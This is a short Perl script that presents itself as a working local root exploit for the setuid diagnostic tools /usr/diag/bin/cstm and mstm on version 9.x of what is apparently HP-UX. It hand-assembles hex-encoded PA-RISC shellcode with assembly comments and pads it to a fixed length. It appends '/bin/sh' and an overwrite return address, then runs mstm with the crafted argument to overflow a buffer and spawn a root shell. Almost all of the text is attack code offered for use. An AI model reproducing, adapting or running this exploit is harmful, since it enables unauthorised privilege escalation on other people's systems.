#!/usr/bin/perl

# working exlpoit for 9.X setuid root /usr/diag/bin/[cm]stm

use FileHandle;

sub h2cs {
  local($stuff)=@_;
  local($rv);
  while($stuff !~ /^$/) {
    $bob=$stuff;
    $bob =~ s/^(..).*$/$1/;
    $stuff =~ s/^..//;
    $rv.=chr(oct("0x${bob}"));
    }
  return $rv;
  }

$code="AA"; # two byte alignment

$code.=h2cs("34010102"); # ldi 129,r1
$code.=h2cs("08220401"); # sub rp,r1,r1
$code.=h2cs("602002a6"); # stb r0,339(r1)
#$code.=h2cs("602002ac"); # stb r0,342(r1)
$code.=h2cs("b43a0298"); # addi 332,r1,arg0
$code.=h2cs("34160176"); # ldi 187,r22
$code.=h2cs("34010276"); # ldi 315,r1
$code.=h2cs("08360216"); # and r22,r1,r22
$code.=h2cs("20200801"); # ldil l%c0000004,r1
$code.=h2cs("e420e008"); # ble 4(sr7,r1)
$code.=h2cs("08210280"); # NOP == xor r1,r1,r0
#$code.=h2cs("deadcafe"); # illegal instruction
$num=208-length($code);
$code.="C"x$num;

$data="/bin/sh.sh.";
$num=16-length($data);
$data.="D"x$num;

$num=224-length($of);
$of=$code.$data;
$of.=h2cs("7b03301B");
print "Length is: ",length($of),"\n";
exec("/usr/diag/bin/mstm","-l","$of");